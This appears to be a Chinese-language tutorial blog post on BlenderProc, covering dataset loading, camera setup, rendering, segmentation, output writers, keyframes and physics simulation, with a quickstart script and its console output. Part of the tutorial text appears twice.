    • blenderproc download haven <output_dir>:从 polyhaven.com 下载HDRI、纹理和模型。
    • blenderproc download ikea <output_dir>:下载宜家数据集。(目前此数据集不可用!
    • blenderproc download pix3d <output_dir>:下载 Pix3D 数据集。
    • blenderproc download scenenet <output_dir>:下载场景网数据集。
    • blenderproc download matterport3d <output_dir>:下载 Matterport3D 数据集。

    装载

    ​ BlenderProc 提供了多种导入 3D 模型的方法。 所有加载器都可以通过方法访问,这些方法都返回已加载的列表。bproc.loader.load_*``MeshObjects

    objs = bproc.loader.load_obj("mymesh.obj")

    特定于文件类型的加载器:

    • bproc.loader.load_obj:正在加载 .obj 和 .ply 文件。
    • bproc.loader.load_blend:从 .blend 文件加载。

    特定于数据集的加载器:

    • bproc.loader.load_AMASS:从 AMASS 数据集加载对象。
    • bproc.loader.load_bop_objs:加载任何 BOP 数据集的 3D 模型,并允许复制 BOP 场景。
    • bproc.loader.load_bop_scene:使用 3D 模型加载任何真实的 BOP 场景。
    • bproc.loader.load_bop_intrinsics:加载指定 BOP 数据集的内部函数。
    • bproc.loader.load_front3d:加载 3D 正面场景。
    • bproc.loader.load_ikea:从宜家数据集加载对象。
    • bproc.loader.load_pix3d:加载 Pix3D 对象。
    • bproc.loader.load_replica:从复本数据集加载场景。
    • bproc.loader.load_scenenet:加载场景网络场景。
    • bproc.loader.load_shapenet:从 ShapeNet 数据集加载对象。
    • bproc.loader.load_suncg:加载 SUNCG 场景。
    • bproc.loader.load_matterport3d:加载 Matterport3D 场景。

    操作对象

    ​ 如上所述,加载程序返回 . 这些对象中的每一个都可以以各种方式进行操作:MeshObjects

    改变 poses

    ​ 可以通过以下方式更改对象的位置:

    obj.set_location([2, 0, 1])

    ​ 通过欧拉角设置旋转:

    obj.set_rotation_euler([np.pi, 0, 0])

    ​ 或者通过 4x4 本地到世界变换矩阵设置完整 poses:

    obj.set_local2world_mat(tmat)

    ​ 或者在当前 poses 上应用 4x4 变换矩阵:

    obj.apply_T(tmat)

    自定义属性

    ​ 如果要将任何特定于用户的属性分配给对象,则应使用自定义属性。 以类似键值的方式,您可以将任何所需的值分配给给定对象。

    ​ 以下是设置自定义属性的方式:

    obj.set_cp("my_prop", 42)

    ​ 这就是你检索一个的方式:

    obj.get_cp("my_prop")

    Configuring the camera

    Intrinsics

    K 矩阵

    ​ 最简单的方法是通过 3x3 K 矩阵设置内联函数。

    这段代码使用 numpy 数组创建了一个相机内参矩阵 K,并将其传递给 BlenderProc 的 bproc.camera.set_intrinsics_from_K_matrix() 函数来设置相机的内参。

    K 矩阵是一个 3x3 的矩阵,包含相机的焦距 fx 和 fy、图像中心点的坐标 cx 和 cy、以及一个固定值 1。通过设置这些参数,可以确定相机观察的场景在图像中的投影。

    接下来,使用 bproc.camera.set_intrinsics_from_K_matrix() 函数将 K 矩阵和图像的宽度和高度传递给 BlenderProc。这个函数会将 K 矩阵与其他相关参数一起用于计算相机的内参,从而确保场景在渲染到图像时获得正确的投影。

    K = np.array([
    [fx, 0, cx],
    [0, fy, cy],
    [0, 0, 1]
    ])
    bproc.camera.set_intrinsics_from_K_matrix(K, image_width, image_height)
    直接设置焦距
    bproc.camera.set_intrinsics_from_blender_params(lens=focal_length, lens_unit="MILLIMETERS")
    直接设置视野
    bproc.camera.set_intrinsics_from_blender_params(lens=field_of_view, lens_unit="FOV")

    Extrinsics

    添加新的摄像机姿势是通过指定从摄像机到世界坐标系的 4x4 变换矩阵来完成的。

    bproc.camera.add_camera_pose(tmat) # tmat is a 4x4 numpy array

    ​ Blender 使用 OpenGL 坐标框架。 因此,如果要使用 OpenCV 坐标中指定的相机姿势,则需要先转换它们。

    # OpenCV -> OpenGL
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])

    Rendering the scene

    ​ 每个渲染器在配置的间隔内渲染每一帧。 之后,它们返回一个字典,其中包含按类型分组的渲染图像,例如:[frame_start, frame_end - 1]

    {
    "colors": [<np.uint8: [512, 512, 3]>, <np.uint8: [512, 512, 3]>],
    "normals": [<np.float32: [512, 512]>, <np.float32: [512, 512]>],
    "distance": [<np.float32: [512, 512]>, <np.float32: [512, 512]>]
    }

    ​ 在这里,场景是从两个摄像机姿势的视图中渲染的,并激活了法线和距离输出。

    RGB 渲染器

    ​ RGB 渲染器是主渲染器,可以使用文档中列出的各种 API 方法进行配置。

    data = bproc.renderer.render()

    深度、距离和法线

    ​ 无需任何额外的开销,RGB 渲染器可以输出深度/距离和法线图像。 这些附加输出可以通过调用来激活:

    bproc.renderer.enable_distance_output()
    bproc.renderer.enable_depth_output()
    bproc.renderer.enable_normals_output()

    Samples & Denoiser

    ​ 由于 Blender 使用光线跟踪器,因此光线数量会影响所需的计算量和渲染图像中的噪点。 计算的光线越多,渲染时间就越长,但得到的图像越准确、更少噪点。可以通过使用“. ”来控制噪点级别,这意味着对于每个像素,只使用了那么多光线以达到噪点阈值以下。其中,“.”是一个高于和低于 0.1 之间的浮点值。较高的值表示每个像素的噪点更多,而较低的值会导致更少的噪点但需要更长的计算时间。您可以使用该函数来影响每个像素的最大采样数。有关Blender渲染器如何工作的更多信息,请访问 Blender 文档。brpoc.renderer.set_noise_threshold(noise_threshold) noise_threshold 0 0.1 bproc.rendererset_max_amount_of_samples(max_amount_of_samples)

    ​ 不幸的是,所需的噪点水平非常低,无法获得平滑的结果,因此渲染可能需要相当长的时间。 为了减少每个像素所需的样本数量,Blender 提供了降噪器来减少结果图像中的噪点。 通过以下方式设置它们:bproc.renderer.set_denoiser

    • bproc.renderer.set_denoiser("INTEL"):激活英特尔的开放式映像降噪器
    • bproc.renderer.set_denoiser(None):停用所有降噪器。

    ​ 默认情况下使用“英特尔”。

    分割渲染器

    ​ 在分割图像中,对应于同一对象的每个像素都设置为相同的对象相关编号。 用于给定对象的数字类型由以下参数确定:map_by

    • "instance":每个对象都被分配一个唯一的id(在所有帧中保持一致),因此生成的图像可用于Instane分割。
    • "class":使用每个对象的自定义属性,这通常会导致语义分割图像。category_id
    • 此外,还可以使用任何其他属性/自定义属性。如果属性不是数字,则返回实例分割图像以及从实例 ID 到所需非数字属性的映射。

    ​ 当给定多个参数时,还会返回多个分段映射,或者 - 如果相应的属性是非数字的 - 则在 中返回附加映射。map_by``instance_attribute_maps

    ​ 例如:

    data = bproc.renderer.render_segmap(map_by=["instance", "class", "name"])

    ​ 返回的数据将包含(假设两个注册的帧/相机姿势):

    {
    "instance_segmaps": [<np.array, [512, 512]>, <np.array, [512, 512]>],
    "class_segmaps": [<np.array, [512, 512]>, <np.array, [512, 512]>],
    "instance_attribute_maps": [
    [{"idx": 0, "name": "<object_name_0>"}, {"idx": 1, "name": "<object_name_1>"}, ...],
    [{"idx": 0, "name": "<object_name_0>"}, {"idx": 1, "name": "<object_name_1>"}, ...]
    ],
    }

    ​ 对于名称,映射在不同的帧中将保持不变,但是,有些属性可能会因帧而异。 这就是为什么也是按帧给出的原因。instance_attribute_maps

    光流渲染器

    ​ 渲染连续帧之间的(向前/向后)光流可以通过以下方式完成:

    data = bproc.renderer.render_optical_flow()

    ​ 在这里,每个像素描述了从当前帧到下一帧(前进)或上一帧(后退)的变化。

    Writing the results to file

    HDF5 Writer

    ​ 通过使用,所有对应于同一帧的给定数据都打包到一个文件中。 这样做的好处是所有数据都被压缩,不同帧的数据不会混淆。bproc.writer.write_hdf5``.hdf5

    ​ 要可视化给定的 hdf5 文件,您可以使用 BlenderProcs CLI:

    blenderproc vis hdf5 <path_to_file>

    ​ 如果你想读取数据处理代码中的文件,你可以使用 python 包:.hdf5h5py

    import h5py
    with h5py.File("myfile.hdf5") as f:
    colors = np.array(f["colors"])

    ​ 要读取保存在 hdf5 文件中的 json 字符串(例如对象姿势),您可以使用以下代码片段:

    text = np.array(f["object_states"]).tostring()
    obj_states = json.loads(text)

    Coco Writer

    ​ 通过 ,渲染的实例分段以 COCO 格式编写。 在此处阅读有关此格式规格的更多信息 bproc_writer.write_coco_annotations

    ​ 要可视化以 COCO 格式编写的帧,您可以使用 BlenderProcs CLI:

    blenderproc vis coco <path_to_file>

    BOP Writer

    ​ 使用 、深度和 RGB 图像以及相机内在和外在都存储在 BOP 数据集中。 在此处阅读有关 BOP 格式规格的更多信息bproc.writer.write_bop

    How key frames work

    ​ Blender 和 BlenderProc 使用关键帧在一个渲染调用中渲染多个图像。 这使得渲染相同的场景(例如,只有不同的摄像机姿势)更快,因为网格只需移动到显卡一次。

    Concept

    ​ 调用时,Blender 将遍历间隔中的所有关键帧,并为每个关键帧渲染一次场景。 因此,可以将每个关键帧分配给不同的属性值,例如相机或对象姿势,这些属性值将在渲染相应关键帧时设置。bproc.renderer.render() [frame_start, frame_end - 1]

    Camera

    ​ 一开始,frame_startframe_end都设置为0。调用bproc.camera.add_camera_pose(matrix_world)时,会自动添加一个新的关键帧(frame_end会增加1),并将给定的相机姿态分配给它。您也可以通过bproc.camera.add_camera_pose(matrix_world, i)将相机姿态设置为特定的关键帧,如果需要,frame_end也会相应地增加。

    Objects

    ​ 当设置物体姿态时,例如通过obj.set_location(location),它们默认会为所有关键帧设置。如果您想将物体姿态分配到特定的帧上,则可以使用参数:frame。例如,obj.set_location(location, frame=i)

    Debugging

    ​ 要检查实际设置了哪些关键帧,可以在 BlenderProcs 调试模式下查看它们(请阅读快速入门以了解如何进入调试模式)。运行脚本后,切换到 Layout 选项卡。

    ​ 在布局选项卡中,您应该看到 Blender 的下半部分区域。在该区域中,您应该看到当前活动对象的关键帧。在 3D 视图中对相机执行左键单击,以查看所有注册的相机姿态。每个已注册的关键帧都通过黄色标记进行可视化。Timeline

    ​ 您可以通过移动蓝色播放头或在右上角设置起始/结束数字来更改当前活动帧。 3D 视图始终显示分配给当前活动帧的场景状态(按Numpad0 键可查看当前相机视图的场景)。

    Render multiple times

    ​ 在一个会话中可以多次渲染。唯一需要记住的是在每次运行开始时要删除所有关键帧,可以通过调用bproc.utility.reset_keyframes()来完成。

    ​ 因此,假设您的Python脚本具有以下结构:

    <object loading>

    <light setting>

    <setting random object poses>

    <camera sampling>

    <rendering>

    <writing to file>

    ​ 要在一次运行中进行摄像机/物体姿态采样和多次渲染,只需按以下方式调整脚本:

    <object loading>

    <light creation>

    for r in range(NUM_RUNS):
    bproc.utility.reset_keyframes()

    <setting random object poses>

    <setting random light poses & strengths>

    <camera sampling>

    <rendering>

    <writing to file>

    ​ 其他属性(例如物体材质)不能设置为关键帧,因此一个渲染路径的所有图像都将包含相同的材质。对于这些属性,最好使用单个或少量关键帧频繁调用渲染函数,在渲染调用之间进行操作。

    Physics simulation

    ​ 例如,要将对象随机放置在给定的表面上,BlenderProc 可以使用 Blender 的刚体模拟器。简而言之,使用该模拟器,物体被放置在表面上,然后固定在它们停止的位置上。

    Rigidy body components

    ​ 为了使物体参与模拟,需要通过函数.enable_rigidbody()启用其刚体组件。使用该函数,可以指定所有物理属性(如质量、摩擦等)。

    The parameteractive

    ​ 该参数(active)确定物体是否应积极参与模拟(即是否应该移动),还是作为障碍物(active =True =False)。

    The parametercollision_shape

    ​ 选择collision_shape对于实现稳定的模拟至关重要。如果您的物体是凸面的,或者您不介意它的碰撞形状是它的凸包,那么您应该选择默认值CONVEX_HULL。这将导致快速且稳定的模拟。

    ​ 但是,如果您有非凸面的物体并且希望获得精确的结果,则可能无法使用CONVEX_HULL。您可以使用MESH代替,但是特别是如果物体有薄部分,则这将使模拟非常不稳定,并且您的物体可能会互相穿透。

    Convex decomposition
    obj.enable_rigidbody(active=True, collision_shape="COMPOUND")
    obj.build_convex_decomposition_collision_shape("<Path where to store vhacd>")

    ​ 首先,启用您的物体的刚体元素,并将其碰撞形状设置为COMPOUND。这意味着它的碰撞形状将是其子对象的碰撞形状(即凸面部分)的并集。

    ​ 第二个命令将对物体执行凸分解,并将其凸面部分设置为原始物体的子对象。这些子对象在渲染中不可见,只用作碰撞形状!由于凸分解每个物体需要几秒钟的计算时间,因此结果将被缓存,并在同一物体上再次执行凸分解时自动重复使用。

    Run the simulation

    Simulate and fix poses afterwards

    在通常的用例中,可以使用以下命令:

    bproc.object.simulate_physics_and_fix_final_poses(
    min_simulation_time=4,
    max_simulation_time=20,
    check_object_interval=1
    )

    ​ 这将运行模拟,随后修复每个物体的最终静止姿态(模拟本身将被丢弃)。运行物理模拟时,模块以1秒为间隔检查是否仍有物体在移动。如果不是这种情况,模拟将停止。但是,模拟至少运行4秒,最多运行20秒。

    bproc.object.simulate_physics_and_fix_final_poses() 函数用于模拟物理行为并修正最终的位置和姿态。具体而言,该函数会首先对物体进行一定时间范围内的物理模拟,并在模拟结束后修正物体在场景中的最终位置和姿态。这个函数可以用于在场景中添加更真实的物理效果,例如模拟某个物体从桌子上掉落到地面上的过程。

    该函数接受以下参数:

    • min_simulation_time(可选):最短的物理模拟时间。默认值为 4。
    • max_simulation_time(可选):最长的物理模拟时间。默认值为 20。
    • check_object_interval(可选):定期检查物体位置和姿态的时间间隔。默认值为 1。

    需要注意的是,该函数只适用于带有物理信息的物体。要使用该函数,物体必须已经被标记为可进行物理模拟。这可以通过在 Blender 中为物体设置适当的物理属性来完成。例如,在 Blender 中可以将物体的刚体类型设置为 RIGID_BODY,以启用物理模拟。

    Just simulate

    ​ 如果您想要渲染模拟本身,请使用以下命令:

    bproc.object.simulate_physics(
    min_simulation_time=4,
    max_simulation_time=20,
    check_object_interval=1
    )

    ​ 这类似于bproc.object.simulate_physics_and_fix_final_poses,但整个模拟将被保留。因此,如果之后渲染场景,它将显示模拟本身。

    您可能需要手动增加渲染间隔:

    # This will make the renderer render the first 100 frames of the simulation
    bproc.utility.set_keyframe_render_interval(frame_end=100)

    Examples

    • BlenderProc/README.md at main · DLR-RM/BlenderProc · GitHub

    • BlenderProc的核心示例集合。通过这些示例,您可以学习如何使用BlenderProc运行流水线,从而生成各种类型的渲染图像。

      • 基本示例:介绍了BlenderProc的基本功能以及在运行流水线时会发生的事情。
      • 相机采样:演示如何在形状内对不同相机位置进行采样,并设置旋转约束。
      • 光照采样:展示如何在几何形状内对光源姿态进行采样。
      • 实体操作:通过选择配置文件中的实体来更改其各种参数。
      • 材质操作:展示了如何选择和操作材质。
      • 物理定位:演示了如何启用场景中对象之间的简单模拟物理交互。
      • 语义分割:提供了生成给定场景的语义分割标签的方法。
      • 相机和物体姿态:介绍了如何根据相机内参和外参加载和渲染模型。

      我们建议从基本示例开始,按顺序逐步完成每个示例。这样做可以让你更好的掌握BlenderProc的基本功能,并逐步深入到更高级的示例中。

    ]]>
    + 资源

    论文

    ​ 在过去几年中,对可用于训练的高质量图像的需求急剧上升。在姿态估计和实例分割中,人工标注数据的工作量巨大。为了避免这种情况,我们提出了 BlenderProc。


    Config

    ​ 作为一般配置,我们使用 YAML 文件。每个配置文件包含三个部分:

    1. 第一部分是 Setup
    1
    2
    3
    4
    5
    6
    7
    8
    "setup": {
    "blender_install_path": "/PATH",
    "blender_version": "blender-2.80",
    "pip": [
    "h5py",
    "imageio"
    ]
    }
    1. 名为 global 的第二部分描述了设置:
    1
    2
    3
    4
    5
    "global": {
    "all": {
    "output_dir": "<args:0>"
    }
    }
    1. 第三部分是 modules,配置中的顺序了执行顺序。每个模块都有一个名称,该名称对应于模块文件夹的名称和类名,管道将动态加载相应的类。这个类必须从我们的模块基类派生,并将执行其中的代码,这里的相应设置将传递给它。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    "modules": [
    {
    "name": "main.Initializer"
    },
    {
    "name": "loader.ObjLoader",
    "config": {"path": "<args:1 >"}
    }
    ]

    LOADER

    加载器模块将各种 3D 网格加载到场景中,此外还将所有其他对象(如灯和相机)加载到场景。

    RENDERER

    渲染器有几个选项:

    • resolution_x, resolution_y:待渲染图像的分辨率

    • samples:渲染场景的采样数量,越多的采样可以减少噪声

    • render_depth:渲染当前图像的深度

    • stero:启动立体声图像的渲染

    Color renderer

    png

    • min_bozes,max_bozes:限制每条光线可以进行的反弹次数;越高,结果的质量越好,但渲染速度越低

    • glossy_bounces:光泽反射反弹的最大数量必须大于零,这样才能看到光泽效果

    Depth renderer

    png

    ​ 该渲染器基于 blender 的内部深度估计生成深度图像。

    Normal renderer

    png

    ​ 许多深度学习任务通过引入法线作为训练问题的输入而大大改进。其中一个问题是例如深度估计。法线被规格化并显示为 XYZ 值。

    Segmentation renderer

    png

    ​ 为了进行分割,每个对象都需要一个类别 id,在 suncg 加载程序中,它们已经被正确设置。对于您自己的加载器,您必须手动执行此操作,方法是将属性 category_id 添加到所有对象中。此属性包含数据集中类的编号。

    ​ 可以创建实例分割掩码,其中不仅保存索引,还保存一个字典,该字典将索引映射到类和实例号。这两个文件都存储在 .hdf5 文件中,这使得使用更加容易。

    ​ 要在语义分割和实例分割之间切换,可以使用以下设置:

    • map_by:如果设置为 class,则完成基于 category_id 的语义分割。如果设置为 instance,则执行实例分割。

    SAMPLER

    ​ BlenderProc 包含多个采样器,通常用于灯光、相机和对象。

    ​ 以下是在生成光源或相机位置时如何轻松使用采样器的两个示例。

    1
    2
    3
    4
    5
    6
    7
    "location": {
    "name": "Uniform3dSampler",
    "parameters": {
    "min": [0, 0, 0],
    "max": [1, 1, 1]
    }
    }

    ​ 此外,每个采样器都可以进行接近度检查。

    1
    2
    3
    4
    5
    6
    7
    8
    "location": {
    "name": "SphereSampler",
    "parameters": {
    "center": [0, 0, 1],
    "radius": 4,
    "mode": "SURFACE"
    }
    }

    ​ 可以对相机进行采样,然后检查该位置是否距离任何对象至少一米,以及场景中对象的平均距离是否在一定范围内。这些选项可以在逻辑上任意组合,这使得创造完美的条件变得容易。在这个例子中,要求相机距离其视野中的任何物体至少一个单位,并且其值上的平均距离在 1 到 4 个单位之间。只有这样才能使用姿势。

    1
    2
    3
    4
    5
    6
    7
    "proximity_checks": {
    "min": 1.0,
    "avg": {
    "min": 1.0,
    "max": 4.0
    }
    }

    GENERATION TIME

    ​ 生成是以批处理的方式离线完成的,如果相机姿势已经采样,那么每个场景只调用特定的渲染器,最后每个相机姿势的所有文件都会合并到 .hdf5 文件中。对于 suncg 文件,我们可以在一个 gpu 上每小时生成大约 3.000 张图像。然而,这些场景相当复杂,在大多数情况下,渲染速度甚至应该比这更快。尽管如此,速度对我们来说并不是什么大问题,因为我们认为生成通常不是一个重复的过程。因此,花一个周末在上面,然后拥有 18 万张图像通常就足够完成大多数训练任务了。

    代码

    Hello World

    ​ 安装环境:

    1
    2
    3
    conda create -n blender python=3.10
    conda activate blender
    pip install Blenderproc

    ​ 在 Pycharm 下使用该环境,创建一个 quickstart.py

    这段代码使用 BlenderProc 包创建了一个简单的场景:在场景中创建了一个猴子模型并添加了一个点光源,然后将相机设置在该模型前方,最后渲染场景并将结果写入 HDF5 文件。下面是这段代码的详细解释:

    首先,通过导入 blenderproc 和 numpy 模块来初始化 BlenderProc。bproc.init() 函数用于初始化 BlenderProc 的渲染器和其他必要组件。

    然后,使用 bproc.object.create_primitive() 函数创建了一个名为 “MONKEY” 的简单对象(即猴子模型)并存储在变量 obj 中。

    接着,使用 bproc.types.Light() 函数创建了一个名为 light 的点光源对象,并将其位置设置为 [2, -2, 0],能量设置为 300。这样一来,场景中的猴子模型将被点光源照亮。

    接下来,使用 bproc.math.build_transformation_mat() 函数创建了一个相机姿态矩阵 cam_pose,并设置相机的位置为 [0, -5, 0],朝向为 [np.pi / 2, 0, 0]。也就是说,相机被放置在场景中猴子的正上方,并指向猴子的正面。

    接着,使用 bproc.camera.add_camera_pose() 函数将相机的位置和朝向应用到场景中。现在的场景已准备好进行渲染。

    使用 bproc.renderer.render() 函数来渲染场景,并将结果返回给变量 data。

    最后,使用 bproc.writer.write_hdf5() 函数将渲染结果写入文件。该函数的第一个参数是保存文件的路径和名称(不包括扩展名),第二个参数是要写入文件的数据。在这里,我们将渲染结果写入了名为 “output.hdf5” 的 HDF5 文件中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import blenderproc as bproc
    import numpy as np

    bproc.init()

    # Create a simple object:
    obj = bproc.object.create_primitive("MONKEY")

    # Create a point light next to it
    light = bproc.types.Light()
    light.set_location([2, -2, 0])
    light.set_energy(300)

    # Set the camera to be in front of the object
    cam_pose = bproc.math.build_transformation_mat([0, -5, 0], [np.pi / 2, 0, 0])
    bproc.camera.add_camera_pose(cam_pose)

    # Render the scene
    data = bproc.renderer.render()

    # Write the rendering into a hdf5 file
    bproc.writer.write_hdf5("output/", data)

    ​ 在 shell 中输入:

    1
    blenderproc run quickstart.py

    ​ 即可开跑(第一次跑会装一堆库)。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    Selecting render devices...
    Device NVIDIA GeForce RTX 4060 Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Fra:0 Mem:8.80M (Peak 8.87M) | Time:00:00.74 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne
    Fra:0 Mem:8.85M (Peak 8.87M) | Time:00:00.74 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Initializing

    ...

    Fra:0 Mem:28.56M (Peak 48.98M) | Time:02:02.85 | Remaining:00:00.01 | Mem:0.33M, Peak:15.33M | Scene, ViewLayer | Sample 1008/1024
    Fra:0 Mem:38.57M (Peak 52.57M) | Time:02:02.86 | Mem:0.33M, Peak:15.33M | Scene, ViewLayer | Sample 1024/1024
    Saved: 'C:\XXX\rgb_0000.png'
    Time: 02:03.50 (Saving: 00:00.32)

    Merging data for frame 0 into output/0.hdf5

    Blender quit
    Cleaning temporary directory

    ​ 运行完后,生成文件 output\0.hdf5

    jpg

    ​ 在 shell 中输入:

    1
    blenderproc vis hdf5 output/0.hdf5

    ​ 即可查看可视化结果:

    jpg

    ​ 在 shell 中输入:

    1
    blenderproc debug quickstart.py

    ​ 即可打开 Blender 的 GUI 界面:

    jpg

    ​ 点击 Run BlenderProc 即可开跑!

    jpg

    Tutorials

    Loading and manipulating objects

    下载

    ​ 如果还没有任何数据,BlenderProc 通过 CLI 为许多数据集和免费提供的资产提供下载功能:blenderproc

    • blenderproc download blenderkit <output_dir>:从搅拌机套件下载材料和模型
    • blenderproc download cc_textures <output_dir>:从 cc0textures.com 下载纹理。
    • blenderproc download haven <output_dir>:从 polyhaven.com 下载HDRI、纹理和模型。
    • blenderproc download ikea <output_dir>:下载宜家数据集。(目前此数据集不可用!
    • blenderproc download pix3d <output_dir>:下载 Pix3D 数据集。
    • blenderproc download scenenet <output_dir>:下载场景网数据集。
    • blenderproc download matterport3d <output_dir>:下载 Matterport3D 数据集。

    装载

    ​ BlenderProc 提供了多种导入 3D 模型的方法。 所有加载器都可以通过方法访问,这些方法都返回已加载的列表。bproc.loader.load_*``MeshObjects

    1
    objs = bproc.loader.load_obj("mymesh.obj")

    特定于文件类型的加载器:

    • bproc.loader.load_obj:正在加载 .obj 和 .ply 文件。
    • bproc.loader.load_blend:从 .blend 文件加载。

    特定于数据集的加载器:

    • bproc.loader.load_AMASS:从 AMASS 数据集加载对象。
    • bproc.loader.load_bop_objs:加载任何 BOP 数据集的 3D 模型,并允许复制 BOP 场景。
    • bproc.loader.load_bop_scene:使用 3D 模型加载任何真实的 BOP 场景。
    • bproc.loader.load_bop_intrinsics:加载指定 BOP 数据集的内部函数。
    • bproc.loader.load_front3d:加载 3D 正面场景。
    • bproc.loader.load_ikea:从宜家数据集加载对象。
    • bproc.loader.load_pix3d:加载 Pix3D 对象。
    • bproc.loader.load_replica:从复本数据集加载场景。
    • bproc.loader.load_scenenet:加载场景网络场景。
    • bproc.loader.load_shapenet:从 ShapeNet 数据集加载对象。
    • bproc.loader.load_suncg:加载 SUNCG 场景。
    • bproc.loader.load_matterport3d:加载 Matterport3D 场景。

    操作对象

    ​ 如上所述,加载程序返回 . 这些对象中的每一个都可以以各种方式进行操作:MeshObjects

    改变 poses

    ​ 可以通过以下方式更改对象的位置:

    1
    obj.set_location([2, 0, 1])

    ​ 通过欧拉角设置旋转:

    1
    obj.set_rotation_euler([np.pi, 0, 0])

    ​ 或者通过 4x4 本地到世界变换矩阵设置完整 poses:

    1
    obj.set_local2world_mat(tmat)

    ​ 或者在当前 poses 上应用 4x4 变换矩阵:

    1
    obj.apply_T(tmat)

    自定义属性

    ​ 如果要将任何特定于用户的属性分配给对象,则应使用自定义属性。 以类似键值的方式,您可以将任何所需的值分配给给定对象。

    ​ 以下是设置自定义属性的方式:

    1
    obj.set_cp("my_prop", 42)

    ​ 这就是你检索一个的方式:

    1
    obj.get_cp("my_prop")

    Configuring the camera

    Intrinsics

    K 矩阵

    ​ 最简单的方法是通过 3x3 K 矩阵设置内联函数。

    这段代码使用 numpy 数组创建了一个相机内参矩阵 K,并将其传递给 BlenderProc 的 bproc.camera.set_intrinsics_from_K_matrix() 函数来设置相机的内参。

    K 矩阵是一个 3x3 的矩阵,包含相机的焦距 fx 和 fy、图像中心点的坐标 cx 和 cy、以及一个固定值 1。通过设置这些参数,可以确定相机观察的场景在图像中的投影。

    接下来,使用 bproc.camera.set_intrinsics_from_K_matrix() 函数将 K 矩阵和图像的宽度和高度传递给 BlenderProc。这个函数会将 K 矩阵与其他相关参数一起用于计算相机的内参,从而确保场景在渲染到图像时获得正确的投影。

    1
    2
    3
    4
    5
    6
    K = np.array([
    [fx, 0, cx],
    [0, fy, cy],
    [0, 0, 1]
    ])
    bproc.camera.set_intrinsics_from_K_matrix(K, image_width, image_height)
    直接设置焦距
    1
    bproc.camera.set_intrinsics_from_blender_params(lens=focal_length, lens_unit="MILLIMETERS")
    直接设置视野
    1
    bproc.camera.set_intrinsics_from_blender_params(lens=field_of_view, lens_unit="FOV")

    Extrinsics

    添加新的摄像机姿势是通过指定从摄像机到世界坐标系的 4x4 变换矩阵来完成的。

    1
    bproc.camera.add_camera_pose(tmat) # tmat is a 4x4 numpy array

    ​ Blender 使用 OpenGL 坐标框架。 因此,如果要使用 OpenCV 坐标中指定的相机姿势,则需要先转换它们。

    1
    2
    # OpenCV -> OpenGL
    cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])

    Rendering the scene

    ​ 每个渲染器在配置的间隔内渲染每一帧。 之后,它们返回一个字典,其中包含按类型分组的渲染图像,例如:[frame_start, frame_end - 1]

    1
    2
    3
    4
    5
    {
    "colors": [<np.uint8: [512, 512, 3]>, <np.uint8: [512, 512, 3]>],
    "normals": [<np.float32: [512, 512]>, <np.float32: [512, 512]>],
    "distance": [<np.float32: [512, 512]>, <np.float32: [512, 512]>]
    }

    ​ 在这里,场景是从两个摄像机姿势的视图中渲染的,并激活了法线和距离输出。

    RGB 渲染器

    ​ RGB 渲染器是主渲染器,可以使用文档中列出的各种 API 方法进行配置。

    1
    data = bproc.renderer.render()

    深度、距离和法线

    ​ 无需任何额外的开销,RGB 渲染器可以输出深度/距离和法线图像。 这些附加输出可以通过调用来激活:

    1
    2
    3
    bproc.renderer.enable_distance_output()
    bproc.renderer.enable_depth_output()
    bproc.renderer.enable_normals_output()

    Samples & Denoiser

    ​ 由于 Blender 使用光线跟踪器,因此光线数量会影响所需的计算量和渲染图像中的噪点。 计算的光线越多,渲染时间就越长,但得到的图像越准确、更少噪点。可以通过使用“. ”来控制噪点级别,这意味着对于每个像素,只使用了那么多光线以达到噪点阈值以下。其中,“.”是一个高于和低于 0.1 之间的浮点值。较高的值表示每个像素的噪点更多,而较低的值会导致更少的噪点但需要更长的计算时间。您可以使用该函数来影响每个像素的最大采样数。有关Blender渲染器如何工作的更多信息,请访问 Blender 文档。brpoc.renderer.set_noise_threshold(noise_threshold) noise_threshold 0 0.1 bproc.rendererset_max_amount_of_samples(max_amount_of_samples)

    ​ 不幸的是,所需的噪点水平非常低,无法获得平滑的结果,因此渲染可能需要相当长的时间。 为了减少每个像素所需的样本数量,Blender 提供了降噪器来减少结果图像中的噪点。 通过以下方式设置它们:bproc.renderer.set_denoiser

    • bproc.renderer.set_denoiser("INTEL"):激活英特尔的开放式映像降噪器
    • bproc.renderer.set_denoiser(None):停用所有降噪器。

    ​ 默认情况下使用“英特尔”。

    分割渲染器

    ​ 在分割图像中,对应于同一对象的每个像素都设置为相同的对象相关编号。 用于给定对象的数字类型由以下参数确定:map_by

    • "instance":每个对象都被分配一个唯一的id(在所有帧中保持一致),因此生成的图像可用于Instane分割。
    • "class":使用每个对象的自定义属性,这通常会导致语义分割图像。category_id
    • 此外,还可以使用任何其他属性/自定义属性。如果属性不是数字,则返回实例分割图像以及从实例 ID 到所需非数字属性的映射。

    ​ 当给定多个参数时,还会返回多个分段映射,或者 - 如果相应的属性是非数字的 - 则在 中返回附加映射。map_by``instance_attribute_maps

    ​ 例如:

    1
    data = bproc.renderer.render_segmap(map_by=["instance", "class", "name"])

    ​ 返回的数据将包含(假设两个注册的帧/相机姿势):

    1
    2
    3
    4
    5
    6
    7
    8
    {
    "instance_segmaps": [<np.array, [512, 512]>, <np.array, [512, 512]>],
    "class_segmaps": [<np.array, [512, 512]>, <np.array, [512, 512]>],
    "instance_attribute_maps": [
    [{"idx": 0, "name": "<object_name_0>"}, {"idx": 1, "name": "<object_name_1>"}, ...],
    [{"idx": 0, "name": "<object_name_0>"}, {"idx": 1, "name": "<object_name_1>"}, ...]
    ],
    }

    ​ 对于名称,映射在不同的帧中将保持不变,但是,有些属性可能会因帧而异。 这就是为什么也是按帧给出的原因。instance_attribute_maps

    光流渲染器

    ​ 渲染连续帧之间的(向前/向后)光流可以通过以下方式完成:

    1
    data = bproc.renderer.render_optical_flow()

    ​ 在这里,每个像素描述了从当前帧到下一帧(前进)或上一帧(后退)的变化。

    Writing the results to file

    HDF5 Writer

